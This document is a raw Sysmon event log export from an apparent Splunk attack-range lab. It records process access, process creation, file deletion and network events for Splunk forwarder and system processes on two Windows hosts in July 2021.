07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.342{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.982{0C1E0330-F533-60EB-8679-00000000D001}30282420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.935{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=435B0F165A61AF3FB638F73B80C3AFEE,SHA256=D732EA1F09CF5ECBB3B57A0538DF0597E5B813EDA8767411BE133F0D6FF3BEC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:27.751{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=697B4A7D112AE01FFB6E69B883E9516A,SHA256=544EC8738825ADF5206BE65F99CBCAE2CF851C4E3EB6DA39CA907FEED56B69F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:19.723{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51059-false10.0.1.12-8000- 10341000x8000000000000000807982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.701{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.232{0C1E0330-F533-60EB-8579-00000000D001}35522960C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F533-60EB-8579-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:27.028{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 